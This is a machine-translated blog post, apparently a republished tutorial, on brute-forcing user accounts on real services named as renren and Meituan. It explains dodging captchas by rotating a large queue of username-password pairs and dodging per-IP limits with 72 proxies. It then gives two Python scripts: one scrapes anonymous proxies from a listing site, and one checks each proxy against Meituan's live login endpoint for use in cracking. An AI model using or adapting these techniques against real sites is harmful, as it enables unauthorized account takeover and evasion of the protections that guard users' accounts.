Get and validate the Python script for the HTTP agent in bulk
- 2020-05-30 20:27:18
- OfStack
Here are some common techniques for brute force cracking:
1. When scanning renren, I encountered a single account error twice, forcing me to enter the verification code, but the other party did not implement the IP policy.
I bypass the captcha by maintaining a 100,000 (username, password) queue. The specific approach is, when a user name, password combination encountered the need for verification code, the crack sequence suspended, placed at the end of the queue for the next test, continue to crack other account passwords.
This ensures that two-thirds of the time is spent doing normal cracking and scanning.
2. When cracking a certain system account on Meituan network, I encountered a certain limit on the access of a single IP, so the request frequency should not be too fast. So I hung up 72 HTTP agents to fix the problem. It seems that every IP request is normal, but in fact, from the whole process, the efficiency is considerable.
In this post I posted a script snippet of my own grab HTTP, which was actually only a few lines long. Anonymous proxy fetching from this: http: / / www xici. net. co/nn /
First get the list of agents:
from bs4 import BeautifulSoup
import urllib2
of = open('proxy.txt' , 'w')
for page in range(1, 160):
html_doc = urllib2.urlopen('http://www.xici.net.co/nn/' + str(page) ).read()
soup = BeautifulSoup(html_doc)
trs = soup.find('table', id='ip_list').find_all('tr')
for tr in trs[1:]:
tds = tr.find_all('td')
ip = tds[1].text.strip()
port = tds[2].text.strip()
protocol = tds[5].text.strip()
if protocol == 'HTTP' or protocol == 'HTTPS':
of.write('%s=%s:%s\n' % (protocol, ip, port) )
print '%s=%s:%s' % (protocol, ip, port)
of.close()
Then verify whether the agent is available, because I am used to crack the account of Meituan network system, so I use the page mark of Meituan:
#encoding=gbk
import httplib
import time
import urllib
import threading
inFile = open('proxy.txt', 'r')
outFile = open('available.txt', 'w')
lock = threading.Lock()
def test():
while True:
lock.acquire()
line = inFile.readline().strip()
lock.release()
if len(line) == 0: break
protocol, proxy = line.split('=')
headers = {'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': ''}
try:
conn = httplib.HTTPConnection(proxy, timeout=3.0)
conn.request(method='POST', url='http://e.meituan.com/m/account/login', body='login=ttttttttttttttttttttttttttttttttttttt&password=bb&remember_username=1&auto_login=1', headers=headers )
res = conn.getresponse()
ret_headers = str( res.getheaders() )
html_doc = res.read().decode('utf-8')
print html_doc.encode('gbk')
if ret_headers.find(u'/m/account/login/') > 0:
lock.acquire()
print 'add proxy', proxy
outFile.write(proxy + '\n')
lock.release()
else:
print '.',
except Exception, e:
print e
all_thread = []
for i in range(50):
t = threading.Thread(target=test)
all_thread.append(t)
t.start()
for t in all_thread:
t.join()
inFile.close()
outFile.close()